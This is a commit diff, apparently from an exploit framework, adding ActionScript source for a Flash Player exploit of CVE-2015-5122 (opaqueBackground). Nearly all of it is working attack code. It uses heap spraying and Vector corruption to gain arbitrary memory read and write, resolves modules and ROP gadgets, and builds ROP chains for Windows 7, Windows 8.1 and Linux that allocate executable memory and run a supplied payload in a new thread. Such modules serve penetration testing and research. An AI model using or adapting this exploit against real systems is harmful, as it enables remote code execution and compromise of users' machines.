Land #5698, Adobe Flash CVE-2015-5122 opaqueBackground
commit
1866ea0880
Binary file not shown.
|
@ -0,0 +1,235 @@
|
|||
package
|
||||
{
|
||||
public class Elf
|
||||
{
|
||||
private const PT_DYNAMIC:uint = 2
|
||||
private const PT_LOAD:uint = 1
|
||||
private const PT_READ_EXEC:uint = 5
|
||||
private const DT_SYMTAB:uint = 6
|
||||
private const DT_STRTAB:uint = 5
|
||||
private const DT_PLTGOT:uint = 3
|
||||
|
||||
private var e_ba:ExploitByteArray
|
||||
// elf base address
|
||||
public var base:uint = 0
|
||||
// program header address
|
||||
public var ph:uint = 0
|
||||
// number of program headers
|
||||
public var ph_size:uint = 0
|
||||
// program header entry size
|
||||
public var ph_esize:uint = 0
|
||||
// DYNAMIC segment address
|
||||
public var seg_dynamic:uint = 0
|
||||
// DYNAMIC segment size
|
||||
public var seg_dynamic_size:uint = 0
|
||||
// CODE segment address
|
||||
public var seg_exec:uint = 0
|
||||
// CODE segment size
|
||||
public var seg_exec_size:uint = 0
|
||||
// .dynsyn section address
|
||||
public var sec_dynsym:uint = 0
|
||||
// .synstr section address
|
||||
public var sec_dynstr:uint = 0
|
||||
// .got.plt section address
|
||||
public var sec_got_plt:uint = 0
|
||||
|
||||
public function Elf(ba:ExploitByteArray, addr:uint)
|
||||
{
|
||||
e_ba = ba
|
||||
set_base(addr)
|
||||
set_program_header()
|
||||
set_program_header_size()
|
||||
set_program_header_entry_size()
|
||||
set_dynamic_segment()
|
||||
set_exec_segment()
|
||||
set_dynsym()
|
||||
set_dynstr()
|
||||
set_got_plt()
|
||||
}
|
||||
|
||||
public function external_symbol(name:String):uint {
|
||||
var entry:uint = 0
|
||||
var st_name:uint = 0
|
||||
var st_value:uint = 0
|
||||
var st_size:uint = 0
|
||||
var st_info:uint = 0
|
||||
var st_other:uint = 0
|
||||
var st_shndx:uint = 0
|
||||
var st_string:String = ""
|
||||
var got_plt_index:uint = 0
|
||||
|
||||
for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
|
||||
entry = sec_dynsym + 0x10 + (i * 0x10)
|
||||
st_name = e_ba.read(entry)
|
||||
st_value = e_ba.read(entry + 4)
|
||||
st_info = e_ba.read(entry + 0xc, "byte")
|
||||
st_string = e_ba.read_string(sec_dynstr + st_name)
|
||||
if (st_string == name) {
|
||||
return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
|
||||
}
|
||||
if (st_info != 0x11) {
|
||||
got_plt_index++
|
||||
}
|
||||
}
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
public function symbol(name:String):uint {
|
||||
var entry:uint = 0
|
||||
var st_name:uint = 0
|
||||
var st_value:uint = 0
|
||||
var st_size:uint = 0
|
||||
var st_info:uint = 0
|
||||
var st_other:uint = 0
|
||||
var st_shndx:uint = 0
|
||||
var st_string:String = ""
|
||||
|
||||
for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
|
||||
entry = sec_dynsym + 0x10 + (i * 0x10)
|
||||
st_name = e_ba.read(entry)
|
||||
st_value = e_ba.read(entry + 4)
|
||||
st_info = e_ba.read(entry + 0xc, "byte")
|
||||
st_string = e_ba.read_string(sec_dynstr + st_name)
|
||||
if (st_string == name) {
|
||||
return base + st_value
|
||||
}
|
||||
}
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
|
||||
public function gadget(gadget:String, hint:uint):uint
|
||||
{
|
||||
var value:uint = parseInt(gadget, 16)
|
||||
var contents:uint = 0
|
||||
for (var i:uint = 0; i < seg_exec_size - 4; i++) {
|
||||
contents = e_ba.read(seg_exec + i)
|
||||
if (hint == 0xffffffff && value == contents) {
|
||||
return seg_exec + i
|
||||
}
|
||||
if (hint != 0xffffffff && value == (contents & hint)) {
|
||||
return seg_exec + i
|
||||
}
|
||||
}
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
private function set_base(addr:uint):void
|
||||
{
|
||||
addr &= 0xffff0000
|
||||
while (true) {
|
||||
if (e_ba.read(addr) == 0x464c457f) {
|
||||
base = addr
|
||||
return
|
||||
}
|
||||
addr -= 0x1000
|
||||
}
|
||||
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
private function set_program_header():void
|
||||
{
|
||||
ph = base + e_ba.read(base + 0x1c)
|
||||
}
|
||||
|
||||
private function set_program_header_size():void
|
||||
{
|
||||
ph_size = e_ba.read(base + 0x2c, "word")
|
||||
}
|
||||
|
||||
private function set_program_header_entry_size():void
|
||||
{
|
||||
ph_esize = e_ba.read(base + 0x2a, "word")
|
||||
}
|
||||
|
||||
private function set_dynamic_segment():void
|
||||
{
|
||||
var entry:uint = 0
|
||||
var p_type:uint = 0
|
||||
|
||||
for (var i:uint = 0; i < ph_size; i++) {
|
||||
entry = ph + (i * ph_esize)
|
||||
p_type = e_ba.read(entry)
|
||||
if (p_type == PT_DYNAMIC) {
|
||||
seg_dynamic = base + e_ba.read(entry + 8)
|
||||
seg_dynamic_size = e_ba.read(entry + 0x14)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
private function set_exec_segment():void
|
||||
{
|
||||
var entry:uint = 0
|
||||
var p_type:uint = 0
|
||||
var p_flags:uint = 0
|
||||
|
||||
for (var i:uint = 0; i < ph_size; i++) {
|
||||
entry = ph + (i * ph_esize)
|
||||
p_type = e_ba.read(entry)
|
||||
p_flags = e_ba.read(entry + 0x18)
|
||||
if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
|
||||
seg_exec = base + e_ba.read(entry + 8)
|
||||
seg_exec_size = e_ba.read(entry + 0x14)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
private function set_dynsym():void
|
||||
{
|
||||
var entry:uint = 0
|
||||
var s_type:uint = 0
|
||||
|
||||
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
|
||||
entry = seg_dynamic + i
|
||||
s_type = e_ba.read(entry)
|
||||
if (s_type == DT_SYMTAB) {
|
||||
sec_dynsym = e_ba.read(entry + 4)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
private function set_dynstr():void
|
||||
{
|
||||
var entry:uint = 0
|
||||
var s_type:uint = 0
|
||||
|
||||
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
|
||||
entry = seg_dynamic + i
|
||||
s_type = e_ba.read(entry)
|
||||
if (s_type == DT_STRTAB) {
|
||||
sec_dynstr = e_ba.read(entry + 4)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
throw new Error()
|
||||
}
|
||||
|
||||
private function set_got_plt():void
|
||||
{
|
||||
var entry:uint = 0
|
||||
var s_type:uint = 0
|
||||
|
||||
for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
|
||||
entry = seg_dynamic + i
|
||||
s_type = e_ba.read(entry)
|
||||
if (s_type == DT_PLTGOT) {
|
||||
sec_got_plt = e_ba.read(entry + 4)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
throw new Error()
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,37 @@
|
|||
package
|
||||
{
|
||||
import flash.display.Sprite
|
||||
import flash.events.Event
|
||||
import mx.utils.Base64Decoder
|
||||
import flash.display.LoaderInfo
|
||||
import flash.utils.ByteArray
|
||||
|
||||
public class Exploit extends Sprite
|
||||
{
|
||||
private var b64:Base64Decoder = new Base64Decoder()
|
||||
private var payload:ByteArray
|
||||
private var platform:String
|
||||
private var os:String
|
||||
|
||||
public function Exploit():void
|
||||
{
|
||||
//trace("Got to checkpoint 0");
|
||||
if (stage) init();
|
||||
else addEventListener(Event.ADDED_TO_STAGE, init);
|
||||
}
|
||||
|
||||
private function init(e:Event = null):void
|
||||
{
|
||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||
os = LoaderInfo(this.root.loaderInfo).parameters.os
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray()
|
||||
|
||||
removeEventListener(Event.ADDED_TO_STAGE, init);
|
||||
MyClass.TryExpl(this, platform, os, payload)
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,85 @@
|
|||
package
|
||||
{
|
||||
import flash.utils.ByteArray
|
||||
|
||||
public class ExploitByteArray
|
||||
{
|
||||
private const MAX_STRING_LENGTH:uint = 100
|
||||
public var ba:ByteArray
|
||||
public var original_length:uint
|
||||
private var platform:String
|
||||
|
||||
public function ExploitByteArray(p:String, l:uint = 1024)
|
||||
{
|
||||
ba = new ByteArray()
|
||||
ba.length = l
|
||||
ba.endian = "littleEndian"
|
||||
ba.writeUnsignedInt(0)
|
||||
platform = p
|
||||
original_length = l
|
||||
}
|
||||
|
||||
public function set_length(length:uint):void
|
||||
{
|
||||
ba.length = length
|
||||
}
|
||||
|
||||
public function get_length():uint
|
||||
{
|
||||
return ba.length
|
||||
}
|
||||
|
||||
public function lets_ready():void
|
||||
{
|
||||
ba.endian = "littleEndian"
|
||||
if (platform == "linux") {
|
||||
ba.length = 0xffffffff
|
||||
}
|
||||
}
|
||||
|
||||
public function is_ready():Boolean
|
||||
{
|
||||
if (ba.length == 0xffffffff)
|
||||
return true
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
public function read(addr:uint, type:String = "dword"):uint
|
||||
{
|
||||
ba.position = addr
|
||||
switch(type) {
|
||||
case "dword":
|
||||
return ba.readUnsignedInt()
|
||||
case "word":
|
||||
return ba.readUnsignedShort()
|
||||
case "byte":
|
||||
return ba.readUnsignedByte()
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
public function read_string(addr:uint, length:uint = 0):String
|
||||
{
|
||||
ba.position = addr
|
||||
if (length == 0)
|
||||
return ba.readUTFBytes(MAX_STRING_LENGTH)
|
||||
else
|
||||
return ba.readUTFBytes(length)
|
||||
}
|
||||
|
||||
public function write(addr:uint, value:* = 0, zero:Boolean = true):void
|
||||
{
|
||||
var i:uint
|
||||
|
||||
if (addr) ba.position = addr
|
||||
if (value is String) {
|
||||
for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
|
||||
if (zero) ba.writeByte(0)
|
||||
} else if (value is ByteArray) {
|
||||
var value_length:uint = value.length
|
||||
for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
|
||||
} else ba.writeUnsignedInt(value)
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,75 @@
|
|||
package
|
||||
{
|
||||
public class ExploitVector
|
||||
{
|
||||
private var uv:Vector.<uint>
|
||||
public var original_length:uint
|
||||
|
||||
public function ExploitVector(v:Vector.<uint>, length:uint)
|
||||
{
|
||||
uv = v
|
||||
original_length = length
|
||||
}
|
||||
|
||||
public function restore():void
|
||||
{
|
||||
uv[0x3ffffffe] = original_length
|
||||
}
|
||||
|
||||
public function is_ready():Boolean
|
||||
{
|
||||
if (uv.length > original_length)
|
||||
{
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
public function at(pos:uint):uint
|
||||
{
|
||||
return uv[pos]
|
||||
}
|
||||
|
||||
// pos: position where a Vector.<Object>[0] lives
|
||||
public function set_own_address(pos:uint):void
|
||||
{
|
||||
uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
|
||||
}
|
||||
|
||||
public function read(addr:uint):uint
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
if (addr > uv[0]) {
|
||||
pos = ((addr - uv[0]) / 4) - 2
|
||||
} else {
|
||||
pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
|
||||
}
|
||||
|
||||
return uv[pos]
|
||||
}
|
||||
|
||||
public function write(addr:uint, value:uint = 0):void
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
if (addr > uv[0]) {
|
||||
pos = ((addr - uv[0]) / 4) - 2
|
||||
} else {
|
||||
pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
|
||||
}
|
||||
|
||||
uv[pos] = value
|
||||
}
|
||||
|
||||
public function search_pattern(pattern:uint, limit:uint):uint
|
||||
{
|
||||
for (var i:uint = 0; i < limit/4; i++) {
|
||||
if (uv[i] == pattern) {
|
||||
return i
|
||||
}
|
||||
}
|
||||
throw new Error()
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,399 @@
|
|||
package
|
||||
{
|
||||
import flash.utils.ByteArray
|
||||
import flash.system.System
|
||||
|
||||
public class Exploiter
|
||||
{
|
||||
private const VECTOR_OBJECTS_LENGTH:uint = 1014
|
||||
private var exploit:Exploit
|
||||
private var ev:ExploitVector
|
||||
private var eba:ExploitByteArray
|
||||
private var payload:ByteArray
|
||||
private var platform:String
|
||||
private var op_system:String
|
||||
private var pos:uint
|
||||
private var byte_array_object:uint
|
||||
private var main:uint
|
||||
private var stack_object:uint
|
||||
private var payload_space_object:uint
|
||||
private var buffer_object:uint
|
||||
private var buffer:uint
|
||||
private var vtable:uint
|
||||
private var stack_address:uint
|
||||
private var payload_address:uint
|
||||
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var spray:Vector.<Object> = new Vector.<Object>(90000)
|
||||
|
||||
public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
|
||||
{
|
||||
exploit = exp
|
||||
payload = p
|
||||
platform = pl
|
||||
op_system = os
|
||||
|
||||
ev = new ExploitVector(uv, uv_length)
|
||||
if (!ev.is_ready()) return
|
||||
eba = new ExploitByteArray(platform)
|
||||
spray_objects()
|
||||
try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
|
||||
ev.set_own_address(pos)
|
||||
if (!disclose_objects()) { ev.restore(); cleanup(); return; }
|
||||
disclose_addresses()
|
||||
corrupt_byte_array()
|
||||
if (!eba.is_ready()) { ev.restore(); cleanup(); return }
|
||||
do_rop()
|
||||
restore_byte_array()
|
||||
ev.restore()
|
||||
cleanup()
|
||||
}
|
||||
|
||||
private function spray_objects():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - spray_objects()")
|
||||
for (var i:uint = 0; i < spray.length; i++)
|
||||
{
|
||||
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
|
||||
spray[i][0] = eba.ba
|
||||
spray[i][1] = exploit
|
||||
spray[i][2] = stack
|
||||
spray[i][3] = payload_space
|
||||
}
|
||||
}
|
||||
|
||||
private function search_objects():uint
|
||||
{
|
||||
Logger.log("[*] Exploiter - search_objects()")
|
||||
var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
|
||||
return idx + 1
|
||||
}
|
||||
|
||||
private function disclose_objects():Boolean
|
||||
{
|
||||
Logger.log("[*] Exploiter - disclose_objects()")
|
||||
byte_array_object = ev.at(pos) - 1
|
||||
main = ev.at(pos + 1) - 1
|
||||
stack_object = ev.at(pos + 2) - 1
|
||||
payload_space_object = ev.at(pos + 3) - 1
|
||||
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
|
||||
return false
|
||||
}
|
||||
return true
|
||||
}
|
||||
|
||||
private function disclose_addresses():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - disclose_addresses()")
|
||||
if (platform == "linux")
|
||||
{
|
||||
buffer_object = ev.read(byte_array_object + 0x10)
|
||||
buffer = ev.read(buffer_object + 0x1c)
|
||||
}
|
||||
else if (platform == "win")
|
||||
{
|
||||
buffer_object = ev.read(byte_array_object + 0x40)
|
||||
buffer = ev.read(buffer_object + 8)
|
||||
}
|
||||
vtable = ev.read(main)
|
||||
stack_address = ev.read(stack_object + 0x18)
|
||||
payload_address = ev.read(payload_space_object + 0x18)
|
||||
}
|
||||
|
||||
private function corrupt_byte_array():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
|
||||
if (platform == "linux")
|
||||
{
|
||||
ev.write(buffer_object + 0x1c) // *array
|
||||
ev.write(buffer_object + 0x20, 0xffffffff) // capacity
|
||||
}
|
||||
else if (platform == "win")
|
||||
{
|
||||
ev.write(buffer_object + 8) // *array
|
||||
ev.write(buffer_object + 16, 0xffffffff) // capacity
|
||||
}
|
||||
eba.lets_ready()
|
||||
}
|
||||
|
||||
private function restore_byte_array():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
|
||||
if (platform == "linux")
|
||||
{
|
||||
ev.write(buffer_object + 0x1c, buffer) // *array
|
||||
ev.write(buffer_object + 0x20, 1024) // capacity
|
||||
}
|
||||
else if (platform == "win")
|
||||
{
|
||||
ev.write(buffer_object + 8, buffer) // *array
|
||||
ev.write(buffer_object + 16, 1024) // capacity
|
||||
}
|
||||
eba.set_length(eba.original_length)
|
||||
}
|
||||
|
||||
private function do_rop():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop()")
|
||||
if (platform == "linux") {
|
||||
do_rop_linux()
|
||||
} else if (platform == "win") {
|
||||
if (op_system == "Windows 8.1") {
|
||||
do_rop_windows8()
|
||||
} else if (op_system == "Windows 7") {
|
||||
do_rop_windows()
|
||||
} else {
|
||||
return
|
||||
}
|
||||
} else {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
private function do_rop_windows():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop_windows()")
|
||||
var pe:PE = new PE(eba)
|
||||
var flash:uint = pe.base(vtable)
|
||||
var winmm:uint = pe.module("winmm.dll", flash)
|
||||
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
|
||||
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
|
||||
var createthread:uint = pe.procedure("CreateThread", kernel32)
|
||||
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
|
||||
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
|
||||
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
|
||||
|
||||
// Continuation of execution
|
||||
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
|
||||
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
|
||||
eba.write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||
|
||||
// Put the payload (command) in memory
|
||||
eba.write(payload_address + 8, payload, true); // payload
|
||||
|
||||
// Put the fake vtabe / stack on memory
|
||||
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||
eba.write(0, virtualprotect)
|
||||
|
||||
// VirtualProtect
|
||||
eba.write(0, virtualalloc)
|
||||
eba.write(0, buffer + 0x10)
|
||||
eba.write(0, 0x1000)
|
||||
eba.write(0, 0x40)
|
||||
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||
|
||||
// VirtualAlloc
|
||||
eba.write(0, memcpy)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, 0x4000)
|
||||
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||
|
||||
// memcpy
|
||||
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, payload_address + 8)
|
||||
eba.write(0, payload.length)
|
||||
|
||||
// CreateThread
|
||||
eba.write(0, createthread)
|
||||
eba.write(0, buffer + 0x10) // return to fix things
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0x7f6e0000)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
|
||||
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||
exploit.toString() // call method in the fake vtable
|
||||
}
|
||||
|
||||
private function do_rop_windows8():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop_windows8()")
|
||||
var pe:PE = new PE(eba)
|
||||
var flash:uint = pe.base(vtable)
|
||||
var winmm:uint = pe.module("winmm.dll", flash)
|
||||
var advapi32:uint = pe.module("advapi32.dll", flash)
|
||||
var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
|
||||
var kernel32:uint = pe.module("kernel32.dll", winmm)
|
||||
var ntdll:uint = pe.module("ntdll.dll", kernel32)
|
||||
var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
|
||||
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
|
||||
var createthread:uint = pe.procedure("CreateThread", kernelbase)
|
||||
var memcpy:uint = pe.procedure("memcpy", ntdll)
|
||||
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
|
||||
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
|
||||
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
|
||||
|
||||
// Continuation of execution
|
||||
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
|
||||
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
|
||||
eba.write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||
|
||||
// Put the payload (command) in memory
|
||||
eba.write(payload_address + 8, payload, true); // payload
|
||||
|
||||
// Put the fake vtabe / stack on memory
|
||||
eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||
eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||
eba.write(0, virtualprotect)
|
||||
|
||||
// VirtualProtect
|
||||
eba.write(0, virtualalloc)
|
||||
eba.write(0, buffer + 0x10)
|
||||
eba.write(0, 0x1000)
|
||||
eba.write(0, 0x40)
|
||||
eba.write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||
|
||||
// VirtualAlloc
|
||||
eba.write(0, memcpy)
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, 0x4000)
|
||||
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
|
||||
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
|
||||
|
||||
// memcpy
|
||||
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, payload_address + 8)
|
||||
eba.write(0, payload.length)
|
||||
|
||||
// CreateThread
|
||||
eba.write(0, createthread)
|
||||
eba.write(0, buffer + 0x10) // return to fix things
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0x7ffd0000)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
eba.write(0, 0)
|
||||
|
||||
eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||
exploit.toString() // call method in the fake vtable
|
||||
}
|
||||
|
||||
private function do_rop_linux():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - do_rop_linux()")
|
||||
var flash:Elf = new Elf(eba, vtable)
|
||||
var feof:uint = flash.external_symbol('feof')
|
||||
var libc:Elf = new Elf(eba, feof)
|
||||
var popen:uint = libc.symbol("popen")
|
||||
var mprotect:uint = libc.symbol("mprotect")
|
||||
var mmap:uint = libc.symbol("mmap")
|
||||
var clone:uint = libc.symbol("clone")
|
||||
var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
|
||||
var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
|
||||
var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
|
||||
|
||||
// Continuation of execution
|
||||
// 1) Recover original vtable
|
||||
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
|
||||
eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
|
||||
eba.write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
// 2) Recover original stack
|
||||
eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
|
||||
|
||||
// my_memcpy
|
||||
eba.write(buffer + 0x60, "\x56", false) // push esi
|
||||
eba.write(0, "\x57", false) // push edi
|
||||
eba.write(0, "\x51", false) // push ecx
|
||||
eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
|
||||
eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
|
||||
eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
|
||||
eba.write(0, "\xF3\xA4", false) // rep movsb
|
||||
eba.write(0, "\x59", false) // pop ecx
|
||||
eba.write(0, "\x5f", false) // pop edi
|
||||
eba.write(0, "\x5e", false) // pop esi
|
||||
eba.write(0, "\xc3", false) // ret
|
||||
|
||||
// Put the popen parameters in memory
|
||||
eba.write(payload_address + 0x8, payload, true) // false
|
||||
|
||||
// Put the fake stack/vtable on memory
|
||||
eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
|
||||
eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
|
||||
eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
|
||||
|
||||
// Return to mprotect()
|
||||
eba.write(stack_address + 0x18034, mprotect)
|
||||
// Return to stackpivot (jmp over mprotect parameters)
|
||||
eba.write(0, addesp2cret)
|
||||
// mprotect() arguments
|
||||
eba.write(0, buffer) // addr
|
||||
eba.write(0, 0x1000) // size
|
||||
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
|
||||
// Return to mmap()
|
||||
eba.write(stack_address + 0x18068, mmap)
|
||||
// Return to stackpivot (jmp over mmap parameters)
|
||||
eba.write(0, addesp2cret)
|
||||
// mmap() code segment arguments
|
||||
eba.write(0, 0x70000000) // 0x70000000
|
||||
eba.write(0, 0x4000) // size
|
||||
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
|
||||
eba.write(0, 0xffffffff) // filedes
|
||||
eba.write(0, 0) // offset
|
||||
|
||||
// Return to mmap()
|
||||
eba.write(stack_address + 0x1809c, mmap)
|
||||
// Return to stackpivot (jmp over mmap parameters)
|
||||
eba.write(0, addesp2cret)
|
||||
// mmap() stack segment arguments
|
||||
eba.write(0, 0x70008000) // NULL
|
||||
eba.write(0, 0x10000) // size
|
||||
eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
|
||||
eba.write(0, -1) // filedes
|
||||
eba.write(0, 0) // offset
|
||||
|
||||
// Return to memcpy()
|
||||
eba.write(stack_address + 0x180d0, buffer + 0x60)
|
||||
// Return to stackpivot (jmp over memcpy parameters)
|
||||
eba.write(0, addesp2cret)
|
||||
// memcpy() parameters
|
||||
eba.write(0, 0x70000000)
|
||||
eba.write(0, payload_address + 0x8)
|
||||
eba.write(0, payload.length)
|
||||
|
||||
// Return to clone()
|
||||
eba.write(stack_address + 0x18104, clone)
|
||||
// Return to CoE (fix stack and object vtable)
|
||||
eba.write(0, buffer + 0x10)
|
||||
// clone() arguments
|
||||
eba.write(0, 0x70000000) // code
|
||||
eba.write(0, 0x7000bff0) // stack
|
||||
eba.write(0, 0x00000100) // flags CLONE_VM
|
||||
eba.write(0, 0) // args
|
||||
|
||||
//call DWORD PTR [eax+0x24]
|
||||
//EAX: 0x41414141 ('AAAA')
|
||||
//EDI: 0xad857088 ("AAAA\377")
|
||||
eba.write(main, stack_address + 0x18000)
|
||||
exploit.hasOwnProperty('msf')
|
||||
}
|
||||
|
||||
private function cleanup():void
|
||||
{
|
||||
Logger.log("[*] Exploiter - cleanup()")
|
||||
spray = null
|
||||
stack = null
|
||||
payload_space = null
|
||||
eba = null
|
||||
ev = null
|
||||
exploit = null
|
||||
System.pauseForGCIfCollectionImminent(0)
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,32 @@
|
|||
package
|
||||
{
|
||||
import flash.external.ExternalInterface
|
||||
|
||||
public class Logger {
|
||||
private static const DEBUG:uint = 1
|
||||
|
||||
public static function alert(msg:String):void
|
||||
{
|
||||
var str:String = "";
|
||||
|
||||
if (DEBUG == 1)
|
||||
str += msg;
|
||||
|
||||
if(ExternalInterface.available){
|
||||
ExternalInterface.call("alert", str);
|
||||
}
|
||||
}
|
||||
|
||||
public static function log(msg:String):void
|
||||
{
|
||||
var str:String = "";
|
||||
|
||||
if (DEBUG == 1)
|
||||
str += msg;
|
||||
|
||||
if(ExternalInterface.available){
|
||||
ExternalInterface.call("console.log", str);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,142 @@
|
|||
package
|
||||
{
|
||||
import flash.display.DisplayObjectContainer;
|
||||
